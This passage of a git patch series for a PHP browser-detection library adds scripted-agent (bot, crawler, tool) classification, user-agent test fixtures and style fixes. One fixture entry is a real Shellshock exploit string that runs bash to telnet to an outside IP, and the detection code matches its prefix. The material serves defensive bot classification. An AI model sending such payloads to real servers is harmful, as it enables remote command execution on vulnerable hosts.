+http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + Mediapartners-Google + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + AdsBot-Google (+http://www.google.com/adsbot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + AdsBot-Google-Mobile-Apps + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Yahoo! Slurp + Spider + + Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Bing + Spider + + Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) + + + + unknown + unknown + unknown + unknown + unknown + unknown + MSN + Spider + + msnbot/2.0b (+http://search.msn.com/msnbot.htm) + + + + unknown + unknown + unknown + unknown + unknown + unknown + MSN + Spider + + msnbot-media/1.1 (+http://search.msn.com/msnbot.htm) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Bing + Ad bots + + Mozilla/5.0 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm) + + + + Mozilla + 5.0 + Windows + 7 + unknown + unknown + Bing + Preview + + Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b + + + + unknown + unknown + unknown + unknown + unknown + unknown + W3C Validator + Tool + + W3C_Validator/1.0 libwww-perl/0.40 + + + + Safari + 8.0 + iOS + 8.1 + iPhone + unknown + Yandex + Spider + + Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexBot/3.0; +http://yandex.com/bots) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Gluten Free + Survey + + Mozilla/5.0 (compatible; Gluten Free Crawler/1.0; +http://glutenfreepleasure.com/) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Twitter + Preview + + Twitterbot/1.0 + + + + Safari + 8.0.2 + OS X + 10.10.1 + unknown + unknown + Apple + Spider + + Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Paper.li + Spider + + Mozilla/5.0 (compatible; PaperLiBot/2.1; http://support.paper.li/entries/20023257-what-is-paper-li) + + + + unknown + unknown + unknown + unknown + unknown + unknown + SocialRank.io + Survey + + SocialRankIOBot; http://socialrank.io/about + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Ahrefs.com Backlink Research Tool + Survey + + Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Majestic12 + Spider + + MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+) + + + + unknown + unknown + unknown + unknown + unknown + unknown + LiveLap + Spider + + LivelapBot/0.2 (http://site.livelap.com/crawler) + + + + Mozilla + 5.0 + Windows + 7 + unknown + unknown + Skype + Preview + + Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 + + + + Safari + unknown + Linux + unknown + unknown + unknown + AdBeat + Ad bots + + Mozilla/5.0 (X11; U; Linux x86; %lang_code%) adbeat.com/policy Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 AppleWebKit/532.4 Safari/532.4 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Facebook + Preview + + facebookexternalhit/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + WEBDAV + Tool + + WEBDAV Client + + + + Firefox + 6.0 + Windows + 7 + unknown + unknown + Google Favicon + Scripted Agent + + Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon + + + + unknown + unknown + unknown + unknown + unknown + unknown + MetaURI + Survey + + MetaURI API/2.0 metauri.com + + + + unknown + unknown + unknown + unknown + unknown + unknown + TLSProbe + Tool + + TLSProbe/1.0 (+https://scan.trustnet.venafi.com/) + + + + Safari + unknown + Linux + unknown + unknown + unknown + Scoop.it + Spider + + Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) imgsizer Safari/537.21 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Netcraft SSL + Survey + + Netcraft SSL Server Survey - contact info@netcraft.com + + + + unknown + unknown + unknown + unknown + unknown + unknown + Curl + Scripted Agent + + curl/7.37.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Python + Scripted Agent + + python-urllib/12.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + GoLang + Scripted Agent + + Go-http-client/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Perl + Scripted Agent + + libwww-perl/1.0 + + + + Firefox + 3.5.3 + Linux + unknown + unknown + unknown + Verisign + Survey + + Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3 + + + + unknown + unknown + Linux + unknown + unknown + unknown + Wget + Tool + + Wget/1.13.4 (linux-gnu) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + ZGrab + Tool + + Mozilla/5.0 zgrab/0.3 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Java + Scripted Agent + + Java/1.6.0_14 + + + + unknown + unknown + unknown + unknown + unknown + unknown + ShellShock exploit + Exploit attempt + + () { :;}; /bin/bash -c \x22telnet 197.242.148.29 9999\x22 () { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq + + + + unknown + unknown + unknown + unknown + unknown + unknown + BrowserShots + Survey + + BrowserShots + + + + unknown + unknown + unknown + unknown + unknown + unknown + Who.is + Spider + + Who.is Bot + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + MageReport + Survey + + Mozilla/5.0 (www.magereport.com/page/about) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Ubermetrics Technologies + Survey + + Mozilla/5.0 (compatible; um-LN/1.0; mailto: techinfo@ubermetrics-technologies.com) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Proximic + Spider + + Mozilla/5.0 (compatible; proximic; +http://www.proximic.com/info/spider.php) + + diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentString.php b/tests/BrowserDetector/Tests/_includes/UserAgentString.php index 919e18e..4bdcfc3 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentString.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentString.php @@ -39,6 +39,16 @@ class UserAgentString */ private $string; + /** + * @var string + */ + private $scriptedAgent; + + /** + * @var string + */ + private $scriptedAgentType; + /** * @return string */ @@ -178,4 +188,40 @@ public function setDeviceVersion($deviceVersion) return $this; } + + /** + * @return string + */ + public function getScriptedAgent() + { + return $this->scriptedAgent; + } + + /** + * @param string $scriptedAgent + * + * @return string + */ + public function setScriptedAgent($scriptedAgent) + { + $this->scriptedAgent = $scriptedAgent; + } + + /** + * @return string + */ + public function getScriptedAgentType() + { + return $this->scriptedAgentType; + } + + /** + * @param string $scriptedAgentType + * + * @return string + */ + public function setScriptedAgentType($scriptedAgentType) + { + $this->scriptedAgentType = $scriptedAgentType; + } } diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php index 08ff5e6..ae62aac 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php @@ -13,16 +13,43 @@ public static function map() { $collection = array(); $xml = new SimpleXmlElement(file_get_contents(FILES . DIRECTORY_SEPARATOR . 'UserAgentStrings.xml')); + foreach ($xml->strings->string as $string) { - $string = $string->field; $userAgentString = new UserAgentString(); - $userAgentString->setBrowser((string)$string[0]); - $userAgentString->setBrowserVersion((string)$string[1]); - $userAgentString->setOs((string)$string[2]); - $userAgentString->setOsVersion((string)$string[3]); - $userAgentString->setDevice((string)$string[4]); - $userAgentString->setDeviceVersion((string)$string[5]); - $userAgentString->setString(str_replace(array(PHP_EOL, ' '), ' ', (string)$string[6])); + foreach($string->children() as $child) + { + $attributes = $child->attributes(); + switch($attributes['name']) + { + case "browser": + $userAgentString->setBrowser((string)$child[0]); + break; + case "version": + $userAgentString->setBrowserVersion((string)$child[0]); + break; + case "os": + $userAgentString->setOs((string)$child[0]); + break; + case "os_version": + $userAgentString->setOsVersion((string)$child[0]); + break; + case "device": + $userAgentString->setDevice((string)$child[0]); + break; + case "device_version": + $userAgentString->setDeviceVersion((string)$child[0]); + break; + case "scripted_agent": + $userAgentString->setScriptedAgent((string)$child[0]); + break; + case "scripted_agent_type": + $userAgentString->setScriptedAgentType((string)$child[0]); + break; + case "string": + $userAgentString->setString(str_replace(array(PHP_EOL, ' '), ' ', (string)(string)$child[0])); + break; + } + } $collection[] = $userAgentString; } From 242c2d7d02cf7e26dba19dc12e97f4b9ea6293f6 Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Thu, 6 Apr 2017 20:16:02 +0100 Subject: [PATCH 10/19] Fix code style --- .../Tests/_includes/UserAgentStringMapper.php | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php index ae62aac..7aba697 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php @@ -16,11 +16,9 @@ public static function map() foreach ($xml->strings->string as $string) { $userAgentString = new UserAgentString(); - foreach($string->children() as $child) - { + foreach ($string->children() as $child) { $attributes = $child->attributes(); - switch($attributes['name']) - { + switch ($attributes['name']) { case "browser": $userAgentString->setBrowser((string)$child[0]); break; From 5568a8a0bb5f3e76fbbbd976d53556333d49b16e Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Tue, 11 Apr 2017 21:55:33 -0400 Subject: [PATCH 11/19] Few style changes --- src/Browser.php | 105 +++++++++++--------------- src/BrowserDetector.php | 2 - src/ScriptedAgentDetector.php | 135 ++++++++++++---------------------- 3 files changed, 86 insertions(+), 156 deletions(-) diff --git a/src/Browser.php b/src/Browser.php index 3340f4c..3ae4d23 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -88,7 +88,6 @@ class Browser /** * @param null|string|UserAgent $userAgent - * * @throws \Sinergi\BrowserDetector\InvalidArgumentException */ public function __construct($userAgent = null) @@ -106,13 +105,11 @@ public function __construct($userAgent = null) * Set the name of the Browser. * * @param string $name - * * @return $this */ public function setName($name) { $this->name = (string)$name; - return $this; } @@ -134,7 +131,6 @@ public function getName() * Check to see if the specific browser is valid. * * @param string $name - * * @return bool */ public function isBrowser($name) @@ -146,13 +142,11 @@ public function isBrowser($name) * Set the version of the browser. * * @param string $version - * * @return $this */ public function setVersion($version) { $this->version = (string)$version; - return $this; } @@ -180,69 +174,61 @@ public function getVersion() public function detectScriptedAgent() { $ua = $this->getUserAgent()->getUserAgentString(); - if (stripos($ua, 'bot') !== FALSE || - stripos($ua, 'spider') !== FALSE || - stripos($ua, 'crawler') !== FALSE || - stripos($ua, 'preview') !== FALSE || - stripos($ua, 'slurp') !== FALSE || - stripos($ua, 'facebookexternalhit') !== FALSE || - stripos($ua, 'mediapartners') !== FALSE || - stripos($ua, 'google-adwords') !== FALSE || - stripos($ua, 'adxvastfetcher') !== FALSE || - stripos($ua, 'adbeat') !== FALSE || - stripos($ua, 'google favicon') !== FALSE || - stripos($ua, 'webdav client') !== FALSE || - stripos($ua, 'metauri api') !== FALSE || - stripos($ua, 'tlsprobe') !== FALSE || - stripos($ua, 'wpif') !== FALSE || - stripos($ua, 'imgsizer') !== FALSE || - stripos($ua, 'netcraft ssl server survey') !== FALSE || - stripos($ua, 'curl/') !== FALSE || - stripos($ua, 'go-http-client/') !== FALSE || - stripos($ua, 'python') !== FALSE || - stripos($ua, 'libwww') !== FALSE || - stripos($ua, 'wget/') !== FALSE || - stripos($ua, 'zgrab/') !== FALSE || - stripos($ua, 'Java/') !== FALSE || - stripos($ua, '() { :;}; /bin/bash -c') !== FALSE || - stripos($ua, 'browsershots') !== FALSE || - stripos($ua, 'magereport') !== FALSE || - stripos($ua, 'ubermetrics-technologies') !== FALSE || - stripos($ua, 'W3C') !== FALSE || - stripos($ua, 'Validator') !== FALSE || - stripos($ua, 'Jigsaw/') !== FALSE || - stripos($ua, 'bing') !== FALSE || - stripos($ua, 'msn') !== FALSE || - stripos($ua, 'Google Web Preview') !== FALSE || - stripos($ua, 'ips-agent') !== FALSE || - (stripos($ua, 'Chrome/51.0.2704.103') !== FALSE && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== FALSE) //ICQ Preview - ) - { + if (stripos($ua, 'bot') !== false || + stripos($ua, 'spider') !== false || + stripos($ua, 'crawler') !== false || + stripos($ua, 'preview') !== false || + stripos($ua, 'slurp') !== false || + stripos($ua, 'facebookexternalhit') !== false || + stripos($ua, 'mediapartners') !== false || + stripos($ua, 'google-adwords') !== false || + stripos($ua, 'adxvastfetcher') !== false || + stripos($ua, 'adbeat') !== false || + stripos($ua, 'google favicon') !== false || + stripos($ua, 'webdav client') !== false || + stripos($ua, 'metauri api') !== false || + stripos($ua, 'tlsprobe') !== false || + stripos($ua, 'wpif') !== false || + stripos($ua, 'imgsizer') !== false || + stripos($ua, 'netcraft ssl server survey') !== false || + stripos($ua, 'curl/') !== false || + stripos($ua, 'go-http-client/') !== false || + stripos($ua, 'python') !== false || + stripos($ua, 'libwww') !== false || + stripos($ua, 'wget/') !== false || + stripos($ua, 'zgrab/') !== false || + stripos($ua, 'Java/') !== false || + stripos($ua, '() { :;}; /bin/bash -c') !== false || + stripos($ua, 'browsershots') !== false || + stripos($ua, 'magereport') !== false || + stripos($ua, 'ubermetrics-technologies') !== false || + stripos($ua, 'W3C') !== false || + stripos($ua, 'Validator') !== false || + stripos($ua, 'Jigsaw/') !== false || + stripos($ua, 'bing') !== false || + stripos($ua, 'msn') !== false || + stripos($ua, 'Google Web Preview') !== false || + stripos($ua, 'ips-agent') !== false || + (stripos($ua, 'Chrome/51.0.2704.103') !== false && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== false) //ICQ Preview + ) { $scriptedAgent = new ScriptedAgent($ua); - if ($scriptedAgent->getName()==ScriptedAgent::UNKNOWN) - { + if ($scriptedAgent->getName()==ScriptedAgent::UNKNOWN) { return false; - } - else - { + } else { return $scriptedAgent; } - } - else - { + } else { return false; } } /** * @param bool $isChromeFrame - * * @return $this */ public function setIsChromeFrame($isChromeFrame) { $this->isChromeFrame = (bool)$isChromeFrame; - return $this; } @@ -269,14 +255,12 @@ public function isChromeFrame() } /** - * @param bool $isChromeFrame - * + * @param bool $isWebkit * @return $this */ public function setIsWebkit($isWebkit) { $this->isWebkit = (bool)$isWebkit; - return $this; } @@ -304,13 +288,11 @@ public function isWebkit() /** * @param bool $isFacebookWebView - * * @return $this */ public function setIsFacebookWebView($isFacebookWebView) { $this->isFacebookWebView = (bool) $isFacebookWebView; - return $this; } @@ -338,13 +320,11 @@ public function isFacebookWebView() /** * @param bool $isTwitterWebView - * * @return $this */ public function setIsTwitterWebView($isTwitterWebView) { $this->isTwitterWebView = (bool) $isTwitterWebView; - return $this; } @@ -372,13 +352,11 @@ public function isTwitterWebView() /** * @param UserAgent $userAgent - * * @return $this */ public function setUserAgent(UserAgent $userAgent) { $this->userAgent = $userAgent; - return $this; } @@ -398,7 +376,6 @@ public function getUserAgent() public function setIsCompatibilityMode($isCompatibilityMode) { $this->isCompatibilityMode = $isCompatibilityMode; - return $this; } diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index 7fef018..8cbc1ba 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -170,8 +170,6 @@ public static function checkTwitterWebView() return false; } - - /** * Determine if the user is using a BlackBerry. * diff --git a/src/ScriptedAgentDetector.php b/src/ScriptedAgentDetector.php index 2cd6d84..220c3d6 100644 --- a/src/ScriptedAgentDetector.php +++ b/src/ScriptedAgentDetector.php @@ -55,7 +55,7 @@ class ScriptedAgentDetector implements DetectorInterface ); /** - * Routine to determine the browser type. + * Routine to determine the scripted agent type. * * @param ScriptedAgent $scriptedAgent * @param UserAgent $userAgent @@ -110,8 +110,7 @@ public static function checkRobotICQ() { //Chrome 51 always provides the Upgrade-Insecure-Requests header. ICQ does not. //But to be extra safe, also check for the russian language which the ICQ bot sets. - if (stripos(self::$userAgentString, 'Chrome/51.0.2704.103') !== FALSE && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== FALSE) - { + if (stripos(self::$userAgentString, 'Chrome/51.0.2704.103') !== false && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== false) { self::$scriptedAgent->setName(ScriptedAgent::ICQ); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://icq.com"); @@ -127,8 +126,7 @@ public static function checkRobotICQ() */ public static function checkRobotGoogle() { - if (stripos(self::$userAgentString, "Googlebot") !== false) - { + if (stripos(self::$userAgentString, "Googlebot") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEBOT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); @@ -138,22 +136,19 @@ public static function checkRobotGoogle() || stripos(self::$userAgentString, "Mediapartners-Google") !== false || stripos(self::$userAgentString, "Google-Adwords") !== false || stripos(self::$userAgentString, "AdXVastFetcher-Google") !== false - ) - { + ) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEADS); self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); return true; } - if (stripos(self::$userAgentString, "Google Favicon") !== false) - { + if (stripos(self::$userAgentString, "Google Favicon") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEFAVICON); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4626518.htm"); return true; } - if (stripos(self::$userAgentString, "Google Web Preview") !== false) - { + if (stripos(self::$userAgentString, "Google Web Preview") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEPREVIEW); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://www.distilnetworks.com/bot-directory/bot/google-web-preview/"); @@ -169,8 +164,7 @@ public static function checkRobotGoogle() */ public static function checkRobotBaidu() { - if (stripos(self::$userAgentString, "Baiduspider") !== false) - { + if (stripos(self::$userAgentString, "Baiduspider") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BAIDU); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); @@ -186,8 +180,7 @@ public static function checkRobotBaidu() */ public static function checkRobotFacebook() { - if (stripos(self::$userAgentString, "facebookexternalhit") !== false) - { + if (stripos(self::$userAgentString, "facebookexternalhit") !== false) { self::$scriptedAgent->setName(ScriptedAgent::FACEBOOK); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://www.facebook.com/externalhit_uatext.php"); @@ -203,30 +196,25 @@ public static function checkRobotFacebook() */ public static function checkRobotBing() { - - if (stripos(self::$userAgentString, "adidxbot/") !== false) - { + if (stripos(self::$userAgentString, "adidxbot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BING); self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); return true; } - if (stripos(self::$userAgentString, "/bingbot.htm") !== false) - { + if (stripos(self::$userAgentString, "/bingbot.htm") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BING); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); return true; } - if (stripos(self::$userAgentString, "/msnbot.htm") !== false) - { + if (stripos(self::$userAgentString, "/msnbot.htm") !== false) { self::$scriptedAgent->setName(ScriptedAgent::MSNBOT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); return true; } - if (stripos(self::$userAgentString, "BingPreview/") !== false) - { + if (stripos(self::$userAgentString, "BingPreview/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BING_PREVIEW); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); @@ -243,8 +231,7 @@ public static function checkRobotBing() */ public static function checkRobotSlurp() { - if (stripos(self::$userAgentString, "Yahoo! Slurp") !== false) - { + if (stripos(self::$userAgentString, "Yahoo! Slurp") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SLURP); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://help.yahoo.com/kb/SLN22600.html"); @@ -260,8 +247,7 @@ public static function checkRobotSlurp() */ public static function checkRobotTwitter() { - if (stripos(self::$userAgentString, "Twitterbot/") !== false) - { + if (stripos(self::$userAgentString, "Twitterbot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::TWITTER); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("http://stackoverflow.com/questions/22362215/twitter-user-agent-on-sharing"); @@ -277,8 +263,7 @@ public static function checkRobotTwitter() */ public static function checkRobotSkype() { - if (stripos(self::$userAgentString, "SkypeUriPreview") !== false) - { + if (stripos(self::$userAgentString, "SkypeUriPreview") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SKYPE); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("http://www.skype.com"); @@ -301,16 +286,14 @@ public static function checkRobotW3CValidator() stripos(self::$userAgentString, "FeedValidator/") !== false || stripos(self::$userAgentString, "Jigsaw/") !== false || stripos(self::$userAgentString, "JW3C_Unicorn/") !== false - ) - { + ) { self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); return true; } if (stripos(self::$userAgentString, "NING/") !== false || - stripos(self::$userAgentString, "W3C-checklink") !== false) - { + stripos(self::$userAgentString, "W3C-checklink") !== false) { self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); @@ -326,8 +309,7 @@ public static function checkRobotW3CValidator() */ public static function checkRobotYandex() { - if (stripos(self::$userAgentString, "YandexBot/") !== false) - { + if (stripos(self::$userAgentString, "YandexBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::YANDEX); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://yandex.com/bots"); @@ -343,8 +325,7 @@ public static function checkRobotYandex() */ public static function checkRobotApple() { - if (stripos(self::$userAgentString, "AppleBot/") !== false) - { + if (stripos(self::$userAgentString, "AppleBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::APPLEBOT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.apple.com/en-gb/HT204683"); @@ -360,8 +341,7 @@ public static function checkRobotApple() */ public static function checkRobotPaperli() { - if (stripos(self::$userAgentString, "PaperLiBot/") !== false) - { + if (stripos(self::$userAgentString, "PaperLiBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PAPERLI); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.paper.li/hc/en-us/articles/204105253-What-is-Paper-li-"); @@ -377,8 +357,7 @@ public static function checkRobotPaperli() */ public static function checkRobotAhrefs() { - if (stripos(self::$userAgentString, "AhrefsBot/") !== false) - { + if (stripos(self::$userAgentString, "AhrefsBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::AHREFS); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://ahrefs.com/robot"); @@ -394,8 +373,7 @@ public static function checkRobotAhrefs() */ public static function checkRobotMJ12() { - if (stripos(self::$userAgentString, "MJ12Bot/") !== false) - { + if (stripos(self::$userAgentString, "MJ12Bot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::MJ12); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://www.majestic12.co.uk/projects/dsearch/mj12bot.php"); @@ -411,8 +389,7 @@ public static function checkRobotMJ12() */ public static function checkRobotLiveLap() { - if (stripos(self::$userAgentString, "LivelapBot/") !== false) - { + if (stripos(self::$userAgentString, "LivelapBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::LIVELAP); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://site.livelap.com/crawler.html"); @@ -429,8 +406,7 @@ public static function checkRobotLiveLap() public static function checkRobotWebdav() { if (stripos(self::$userAgentString, "WEBDAV Client") !== false || - stripos(self::$userAgentString, "Microsoft Office Existence Discovery") !== false) //Office Webdav probe - { + stripos(self::$userAgentString, "Microsoft Office Existence Discovery") !== false) { //Office Webdav probe self::$scriptedAgent->setName(ScriptedAgent::WEBDAV); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://en.wikipedia.org/wiki/WebDAV"); @@ -446,8 +422,7 @@ public static function checkRobotWebdav() */ public static function checkRobotMetaURI() { - if (stripos(self::$userAgentString, "MetaURI API/") !== false) - { + if (stripos(self::$userAgentString, "MetaURI API/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::METAURI); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://github.com/stateless-systems/uri-meta"); @@ -463,8 +438,7 @@ public static function checkRobotMetaURI() */ public static function checkRobotTLSProbe() { - if (stripos(self::$userAgentString, "TLSProbe/") !== false) - { + if (stripos(self::$userAgentString, "TLSProbe/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::TLSPROBE); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://bitbucket.org/marco-bellaccini/tlsprobe"); @@ -481,8 +455,7 @@ public static function checkRobotTLSProbe() public static function checkRobotScoopIt() { if (stripos(self::$userAgentString, "wpif Safari") !== false - || stripos(self::$userAgentString, "imgsizer Safari") !== false) - { + || stripos(self::$userAgentString, "imgsizer Safari") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SCOOPIT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4785385.htm"); @@ -498,8 +471,7 @@ public static function checkRobotScoopIt() */ public static function checkRobotNetcraft() { - if (stripos(self::$userAgentString, "Netcraft SSL Server Survey") !== false) - { + if (stripos(self::$userAgentString, "Netcraft SSL Server Survey") !== false) { self::$scriptedAgent->setName(ScriptedAgent::NETCRAFT); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://www.netcraft.com/internet-data-mining/ssl-survey/"); @@ -515,8 +487,7 @@ public static function checkRobotNetcraft() */ public static function checkRobotCurl() { - if (stripos(self::$userAgentString, "curl/") !== false) - { + if (stripos(self::$userAgentString, "curl/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::CURL); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://curl.haxx.se/"); @@ -533,8 +504,7 @@ public static function checkRobotCurl() public static function checkRobotPython() { if (stripos(self::$userAgentString, "python-requests/") !== false || - stripos(self::$userAgentString, "python-urllib/") !== false) - { + stripos(self::$userAgentString, "python-urllib/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PYTHON); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.python.org/"); @@ -550,8 +520,7 @@ public static function checkRobotPython() */ public static function checkRobotGoLang() { - if (stripos(self::$userAgentString, "Go-http-client") !== false) - { + if (stripos(self::$userAgentString, "Go-http-client") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOLANG); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://golang.org/"); @@ -567,8 +536,7 @@ public static function checkRobotGoLang() */ public static function checkRobotPerl() { - if (stripos(self::$userAgentString, "libwww-perl/") !== false) - { + if (stripos(self::$userAgentString, "libwww-perl/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PERL); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.perl.org/"); @@ -584,8 +552,7 @@ public static function 